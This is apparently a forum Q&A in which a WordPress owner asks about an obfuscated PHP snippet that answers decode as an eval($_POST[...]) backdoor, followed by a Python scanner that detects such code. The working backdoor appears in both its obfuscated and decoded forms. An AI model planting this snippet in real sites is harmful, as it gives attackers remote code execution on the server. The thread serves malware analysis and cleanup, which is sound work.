What does this code do?


I have a WordPress site and it was infected with malware, I think. I have found this bit of PHP code in my files:

$qV="stop_";$s20=strtoupper($qV[4].$qV[3].$qV[2].$qV[0].$qV[1]);if(isset(${$s20}['q140b2c'])){eval(${$s20}['q140b2c']);}

What does it do?

2

There are 2 answers

2
Thomas Nairn, BEST ANSWER
$qV="stop_";$s20=strtoupper($qV[4].$qV[3].$qV[2].$qV[0].$qV[1]);

$s20 evaluates to _POST

if(isset(${$s20}['q140b2c'])){
    eval(${$s20}['q140b2c']);
}

becomes

isset($_POST['q140b2c'])

eval then evaluates whatever is in that post

eval($_POST['q140b2c']);
0
test

I faced the same issue when one of my previous websites was hacked. Same code as above. They are going to put this code in a .php file before the start of the PHP tag.

So it will hold the execution of the PHP site.

To solve it, download all the code, search in the files, and remove it. Then your site works OK.
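The two answers combined, as an added example that is not part of either post: a Python sketch that searches a downloaded copy of the site for `eval()` calls on request data and decodes the string-index trick from the first answer to name the superglobal involved. The function names and regexes are assumptions for illustration, and the patterns are a heuristic for this one obfuscation style only.

```python
import re
import sys
from pathlib import Path

# $name = "literal";
ASSIGN_STR = re.compile(r'\$(\w+)\s*=\s*(["\'])([^"\'\\]*)\2\s*;')
# $name = strtoupper($src[4].$src[3]...);  (the case function is optional)
ASSIGN_IDX = re.compile(
    r'\$(\w+)\s*=\s*(strtoupper|strtolower)?\s*\(?\s*((?:\$\w+\[\d+\]\s*\.?\s*)+)\)?\s*;')
INDEX = re.compile(r'\$(\w+)\[(\d+)\]')
# eval(${$name}[...]) and eval($_POST[...])
EVAL_VARVAR = re.compile(r'\beval\s*\(\s*\$\{\s*\$(\w+)\s*\}\s*\[')
EVAL_DIRECT = re.compile(r'\beval\s*\(\s*\$(_(?:POST|GET|REQUEST|COOKIE))\s*\[')

# Constructed sample: the one-liner quoted in the question, wrapped in PHP tags.
SAMPLE = ('<?php $qV="stop_";$s20=strtoupper($qV[4].$qV[3].$qV[2].$qV[0].$qV[1]);'
          "if(isset(${$s20}['q140b2c'])){eval(${$s20}['q140b2c']);} ?>")

def resolve_strings(php):
    """Map variable names to the strings built from literals and index concatenation."""
    values = {m.group(1): m.group(3) for m in ASSIGN_STR.finditer(php)}
    for name, func, expr in ASSIGN_IDX.findall(php):
        try:
            text = "".join(values[var][int(i)] for var, i in INDEX.findall(expr))
        except (KeyError, IndexError):
            continue  # source string unknown or index out of range: leave unresolved
        values[name] = {"strtoupper": text.upper(), "strtolower": text.lower()}.get(func, text)
    return values

def find_request_eval(php):
    """Return (target, kind) pairs for each eval() fed from request data."""
    findings = [(m.group(1), "direct") for m in EVAL_DIRECT.finditer(php)]
    values = resolve_strings(php)
    for m in EVAL_VARVAR.finditer(php):
        findings.append((values.get(m.group(1), "unresolved"), "variable-variable"))
    return findings

def scan_tree(root):
    """Scan every .php file under root; return {path: findings} for files with hits."""
    hits = {}
    for path in Path(root).rglob("*.php"):
        found = find_request_eval(path.read_text(errors="replace"))
        if found:
            hits[str(path)] = found
    return hits

if __name__ == "__main__":
    for path, found in scan_tree(sys.argv[1] if len(sys.argv) > 1 else ".").items():
        print(path, found)
```

A hit means the file needs manual review and comparison against a clean copy of the same WordPress, plugin or theme version; an empty result does not show the site is clean.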